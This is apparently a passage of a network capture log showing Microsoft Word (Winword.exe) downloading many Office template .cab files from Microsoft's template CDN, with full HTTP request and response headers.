Content-Type: application/vnd.ms-cab-compressed
Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
ETag: 0x8D60DDBA5EDDA1A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ef258b2c-c01e-001b-4d97-a016fb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851217.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 33610
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC881987151
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0171b447-f01e-005b-359a-1db97e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 698244
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
ETag: 0x8D60DDB6CAEA91D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7c59a99-101e-0021-318b-c7a43e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851219.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31605
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC8822FFB6E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d1eac4bf-d01e-0092-5897-a00efc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1766185
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: go+WAx9Av468teUqrut+TA==
Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
ETag: 0x8D60DDC4354B7FB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a3240f77-901e-0000-474a-3a8045000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851220.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31482
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC8827914A7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d704013f-301e-015e-1697-a09fc7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851221.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31562
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC882C4ED43
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e4f000bb-501e-0148-0297-a06910000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1065873
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
ETag: 0x8D60DDB6BA6E455
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9ae00d4d-001e-0028-7797-a0eb82000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851223.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 32833
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC88357BC32
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1e858e71-b01e-0028-5118-2de1ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851225.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31008
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883F49D7D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b3f59ba9-f01e-00aa-4597-a0aa3c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851224.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 30957
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 08kDbk4RWegysbTS6dQr8A==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883A171B7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7a3535a8-301e-0103-55f4-b69543000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328925.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 25314
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8875AEF5A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 77d2d97b-f01e-00d8-5fc1-a3ad73000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 2527736
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8laspQm0xsAUTSeMcDawqA==
Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
ETag: 0x8D60DDBDD02F94A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0e86dec0-501e-00d1-55b9-b9e8a0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851226.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 35519
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC88440C433
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19a4e9a0-101e-0104-7797-a0f920000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0345749101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 261258
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
ETag: 0x8D60DDC968C4F0E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: efa60b57-b01e-011d-0697-a0799b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 723359
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
ETag: 0x8D60DDB43B59EC5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b73fb8ce-601e-005c-4e97-a0df72000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328932.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20554
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887A4CC19
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2cfa2269-c01e-0045-22f2-a05fc9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851222.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 28911
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: bXh7HiI9trkbaSOAYsyocg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC8830E54C8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2bee5db1-501e-00ee-2682-b92003000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328884.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22008
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
ETag: 0x8D36AC8987823BE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f3206081-b01e-0002-7f97-a03492000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03998158.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 42788
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IaS3txYxwszaX7umN1Hw0g==
Last-Modified: Fri, 22 Apr 2016 16:11:18 GMT
ETag: 0x8D36AC8BD065412
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 620287b7-401e-00f2-3213-ba7263000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328916.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 26944
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
ETag: 0x8D36AC886C4C4EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1184cf03-901e-010a-18fd-bfd090000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851227.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31471
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: karb7EFxz6gpK2GEkvXvNA==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC8848A0495
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4eb37c09-b01e-002d-2d25-b93959000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328893.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20235
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
ETag: 0x8D36AC898C9059A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9220a431-b01e-0132-5d97-a07450000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
